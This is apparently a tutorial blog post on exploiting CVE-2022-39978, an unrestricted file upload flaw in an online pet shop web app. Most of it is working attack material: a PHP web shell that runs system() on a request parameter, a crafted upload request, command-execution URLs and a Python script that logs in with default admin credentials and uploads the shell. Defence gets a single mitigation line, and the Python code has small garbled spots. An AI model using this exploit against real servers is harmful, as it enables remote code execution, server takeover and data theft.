CVE-2022-39978 - Exploiting the Arbitrary File Upload Vulnerability in Online Pet Shop Web App v1.

In this article, you'll learn about a dangerous vulnerability in a popular web app—how it works, how to exploit it, and how to protect against it.

Introduction

In September 2022, researchers discovered a critical security flaw—CVE-2022-39978—in the “Online Pet Shop Web App v1.”. This software, often used by small businesses to manage pet store operations and e-commerce, was found to have a serious vulnerability that allows attackers to upload any file they want, including malicious scripts.

Attackers who exploit this bug can take over the server, steal data, or cause other damage. Let’s break down how this attack works, show real code examples, and provide steps for protection.

How the Vulnerability Works

The core flaw is that the Product List’s Editing function allows users to upload images for products, but it does not check if what’s being uploaded is actually an image. This means an attacker can upload a PHP script instead of a real photo.

The app stores this file in the webroot (where web pages and scripts run), and if an attacker accesses their uploaded script, it will execute on the server. This is called remote code execution (RCE)—one of the most dangerous vulnerabilities in web apps.

The Exploitation Process

Let’s walk through the exploitation step-by-step.

The vulnerable upload point is usually found at a URL like

http://[YOUR-TARGET]/admin/products_edit.php?id=[PRODUCT_ID]

This page contains a form for editing a product, including the ability to upload a new picture.

Here’s a simple PHP web shell (shell.php) you can use for testing

<?php
if(isset($_REQUEST['cmd'])){
  echo "<pre>";
  system($_REQUEST['cmd']);
  echo "</pre>";
}
?>

This code allows you to run any command by visiting the script in a browser and passing a cmd parameter.

3. Upload the Malicious File

In the form, select your shell.php (or rename it as shell.jpg if there's basic extension filtering).

Use a tool like Burp Suite or your browser’s Developer Tools to intercept the request and change the Content-Type if you need to bypass restrictions.

Example request snippet

POST /admin/products_edit.php?id=5 HTTP/1.1
Host: victim-petshop.local
Content-Type: multipart/form-data; boundary=---------------------------9051914041544843365972754266

-----------------------------9051914041544843365972754266
Content-Disposition: form-data; name="file"; filename="shell.php"
Content-Type: application/x-php

[PHP CODE HERE]
-----------------------------9051914041544843365972754266--

After uploading, the file is often placed in a web-accessible directory. For example

http://[YOUR-TARGET]/uploads/shell.php

Visit this URL, and if successful, you should see your web shell.

To run commands, just pass them via the cmd parameter

http://[YOUR-TARGET]/uploads/shell.php?cmd=whoami

If you see the server’s username, the exploit worked!

Here is a simple Python script to automate the upload

import requests

url = "http://TARGET/admin/products_edit.php?id=1";
shell = {
    "file": ("shell.php", "<?php system($_GET['cmd']); ?>", "application/x-php")
}

# Replace with actual credentials or skip if not needed
session = requests.Session()
login_data = {"username":"admin", "password":"admin"}
session.post("http://TARGET/admin/login.php";, data=login_data)

r = session.post(url, files=shell)
print("Upload response:", r.status_code)
print("Now access your shell at /uploads/shell.php?cmd=whoami")

How to Fix (Mitigation)

1. Restrict Allowed File Types: Only allow genuine images (validate MIME type, file extension, and, ideally, use libraries to check image content).

Original References

- Exploit Database Entry
- NVD - CVE-2022-39978
- GitHub Security Advisory

Conclusion

CVE-2022-39978 demonstrates once again the dangers of poorly validated file uploads. It’s an easy-to-exploit bug that can lead to total system compromise. If you run or manage the Pet Shop app (or any web application with uploads), always ensure strict checks are in place.